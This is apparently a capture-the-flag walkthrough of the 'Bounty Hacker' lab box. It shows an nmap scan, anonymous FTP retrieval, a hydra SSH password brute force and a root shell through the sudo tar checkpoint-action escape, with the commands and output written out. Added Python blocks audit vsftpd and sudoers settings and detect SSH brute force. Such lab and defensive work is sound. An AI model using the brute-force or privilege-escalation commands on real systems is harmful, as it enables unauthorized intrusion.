Initial Enumeration and User Shell:

As usual, I started with an nmap scan to look for open ports and running services.

[email protected]:~/Documents/thm/bountyHacker$ nmap -sC -sV -oN nmap/initial 10.10.0.33
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-25 18:14 IST
Nmap scan report for 10.10.0.33
Host is up (0.44s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.4.25.235
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.33 seconds

We have FTP running on port 21, SSH on port 22 and an Apache web server on port 80. FTP allows anonymous login, so I enumerated it first: log in with the username anonymous and leave the password empty.
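The anonymous login nmap reported here is a configuration choice on the server side, so it is also something a defender can check for before a scan finds it. As an added example (not part of the original write-up), the Python below parses vsftpd-style key=value configuration, fills in the compiled-in defaults documented in vsftpd.conf(5) for the options it cares about, and reports the weak settings; the two configuration texts are constructed for illustration and are not the box's real /etc/vsftpd.conf.

```python
# Added example: audit a vsftpd.conf for anonymous access and plaintext transport.
# Assumption: the compiled-in defaults below follow vsftpd.conf(5); values are
# compared case-insensitively because vsftpd itself expects YES/NO.
VSFTPD_DEFAULTS = {
    "anonymous_enable": "YES",        # upstream default is YES, which is why this matters
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "write_enable": "NO",
    "ssl_enable": "NO",
}

# Constructed weak configuration: anonymous login on, everything in plain text.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
"""

# Constructed hardened configuration: anonymous login off, TLS forced for local users.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""


def parse_vsftpd_conf(text):
    """Return the effective option map: file values layered over the defaults."""
    conf = dict(VSFTPD_DEFAULTS)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip().upper()
    return conf


def audit_vsftpd(text):
    """Return a list of human-readable findings for the given configuration text."""
    conf = parse_vsftpd_conf(text)
    findings = []
    if conf["anonymous_enable"] == "YES":
        findings.append("anonymous_enable=YES: unauthenticated clients can list and "
                        "download everything under the anonymous root")
        # Anonymous writes need write_enable plus one of the anon_* write options.
        if conf["write_enable"] == "YES" and (
            conf["anon_upload_enable"] == "YES" or conf["anon_mkdir_write_enable"] == "YES"
        ):
            findings.append("anonymous users may also upload or create directories")
    if conf["ssl_enable"] == "NO":
        findings.append("ssl_enable=NO: control and data connections are plain text "
                        "(the 'Control connection is plain text' line in the ftp-syst output)")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_vsftpd(conf) or ["no findings"])
```

Running the block prints two findings for the weak configuration (anonymous login and plaintext transport) and none for the hardened one; the same `audit_vsftpd` function can be pointed at a real file's contents.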

[email protected]:~/Documents/thm/bountyHacker$ ftp 10.10.0.33
Connected to 10.10.0.33.
220 (vsFTPd 3.0.3)
Name (10.10.0.33:madhav): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.06 secs (6.9983 kB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (592.9130 kB/s)
ftp> exit
221 Goodbye.

There are two text files, locks.txt and task.txt, and I downloaded both to my local machine. locks.txt is a wordlist, and task.txt gives us the username.

[email protected]:~/Documents/thm/bountyHacker$ cat task.txt 
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin

Now that we have the username lin and a wordlist, we can try to brute-force the SSH password with hydra.

[email protected]:~/Documents/thm/bountyHacker$ hydra -l lin -P locks.txt 10.10.0.33 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-25 18:18:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.0.33:22/
[22][ssh] host: 10.10.0.33   login: lin   password: **************
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-25 18:18:47

Hurray, we found the password. Now we can log in over SSH and read our first flag.

[email protected]:~/Documents/thm/bountyHacker$ ssh lin@10.10.0.33
The authenticity of host '10.10.0.33 (10.10.0.33)' can't be established.
ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.0.33' (ECDSA) to the list of known hosts.
lin@10.10.0.33's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

83 packages can be updated.
0 updates are security updates.

Last login: Sun Jun  7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ wc -c user.txt 
21 user.txt
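The hydra run above produces a burst of failed SSH logins for one account from one source, followed by a success, which is exactly the shape a defender should alert on. As an added example that is not part of the original write-up, the Python below parses auth.log-style sshd lines and raises a brute-force alert when a source exceeds a failure threshold inside a time window, plus a higher-severity alert when a success follows that burst. The log lines, the 2021 year assumed for syslog timestamps, and the threshold and window values are all constructed assumptions of mine.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample /var/log/auth.log lines (not captured from the box).
SAMPLE_AUTH_LOG = """\
Feb 25 18:18:33 bountyhacker sshd[2301]: Failed password for lin from 10.4.25.235 port 51000 ssh2
Feb 25 18:18:33 bountyhacker sshd[2303]: Failed password for lin from 10.4.25.235 port 51002 ssh2
Feb 25 18:18:34 bountyhacker sshd[2305]: Failed password for lin from 10.4.25.235 port 51004 ssh2
Feb 25 18:18:35 bountyhacker sshd[2307]: Failed password for lin from 10.4.25.235 port 51006 ssh2
Feb 25 18:18:36 bountyhacker sshd[2309]: Failed password for lin from 10.4.25.235 port 51008 ssh2
Feb 25 18:18:37 bountyhacker sshd[2311]: Failed password for lin from 10.4.25.235 port 51010 ssh2
Feb 25 18:18:40 bountyhacker sshd[2313]: Accepted password for lin from 10.4.25.235 port 51012 ssh2
Feb 25 18:20:02 bountyhacker sshd[2330]: Failed password for invalid user admin from 192.168.0.14 port 40000 ssh2
Feb 25 18:30:00 bountyhacker sshd[2350]: Accepted publickey for lin from 192.168.0.14 port 40010 ssh2
"""

# Matches both "Failed password for lin from ..." and "... for invalid user admin from ...".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text, year=2021):
    """Return (timestamp, result, user, ip) tuples. Syslog lines carry no year,
    so one is supplied (assumption: 2021 for the constructed sample)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=5, window=60):
    """Sliding-window detector keyed on source IP.

    Emits ("bruteforce", ip, failures) once a source reaches `threshold`
    failures within `window` seconds, and ("compromise", ip, user) when a
    successful login from an already-flagged source lands inside the window.
    """
    alerts = []
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    flagged = set()
    for ts, result, user, ip in events:
        # Keep only failures still inside the window relative to this event.
        failures[ip] = [t for t in failures[ip] if (ts - t).total_seconds() <= window]
        if result == "Failed":
            failures[ip].append(ts)
            if len(failures[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, len(failures[ip])))
        elif ip in flagged and failures[ip]:
            alerts.append(("compromise", ip, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

On the sample the detector fires once for the burst from 10.4.25.235 and once more for the password login that follows it; the single failed guess for an invalid user from the other address stays below threshold, and the later public-key login from an unflagged source produces nothing.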

Root Shell:

Gaining a root shell on this box was easy. Running sudo -l showed that the user lin can execute /bin/tar as root.

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

After searching on GTFOBins, I found that we can get a root shell by running the following command:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Once we have the root shell, we can read the final flag in the /root directory.

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@bountyhacker:~/Desktop# cd /root
root@bountyhacker:/root# wc -c root.txt 
19 root.txt
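A sudo rule like `(root) /bin/tar` is the kind of thing to catch in a sudoers review rather than in a post-incident timeline. As an added example, not part of the original write-up, the Python below parses sudoers-style rule lines and flags commands whose binaries have well-documented shell escapes (tar's --checkpoint-action, used above, is the instance on this box), treating a bare binary as high severity and one with pinned arguments as something to review for wildcards. The sample rules, the binary list and the severity labels are my own constructed assumptions, not the box's real /etc/sudoers.

```python
import re

# Binaries with documented sudo shell escapes (subset; the list is my assumption,
# drawn from the kind of entries catalogued on GTFOBins). Granting any of these
# as root with free arguments is equivalent to granting a root shell.
SHELL_ESCAPE_BINARIES = {
    "tar", "vim", "vi", "find", "less", "more", "awk", "python", "python3",
    "perl", "bash", "sh", "env", "nmap", "man", "zip",
}

# Constructed /etc/sudoers-style rules for illustration (not the box's file).
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
lin     ALL=(root) /bin/tar
backup  ALL=(root) NOPASSWD: /usr/bin/tar -czf /backup/home.tgz /home
deploy  ALL=(root) NOPASSWD: /usr/local/bin/deploy.sh
ops     ALL=(ALL) ALL
"""

# user  hosts=(runas) [TAG: ...] command[, command]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return (user, runas, tags, [commands]) for each rule line; skips
    comments, blank lines and Defaults entries."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t for t in m["tags"].replace(" ", "").split(":") if t]
        cmds = [c.strip() for c in m["cmds"].split(",")]
        rules.append((m["user"], m["runas"], tags, cmds))
    return rules


def audit_sudoers(text):
    """Return (user, command, severity, reason) findings for non-root users."""
    findings = []
    for user, runas, tags, cmds in parse_sudoers(text):
        if user == "root":
            continue
        for cmd in cmds:
            if cmd == "ALL":
                findings.append((user, cmd, "high", "any command as " + runas))
                continue
            parts = cmd.split()
            prog = parts[0].rsplit("/", 1)[-1]   # basename of the permitted binary
            if prog not in SHELL_ESCAPE_BINARIES:
                continue
            if len(parts) == 1:
                findings.append((user, cmd, "high",
                                 prog + " with free arguments: root shell via documented escape"))
            else:
                findings.append((user, cmd, "review",
                                 prog + " with pinned arguments: check for wildcards"))
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

On the sample, lin's unrestricted tar and ops' ALL come out as high, the backup job's tar with fixed arguments is marked for review, and the custom deploy script is not flagged because nothing is known about it; a real review would read that script as well.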

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Yegor Meteor.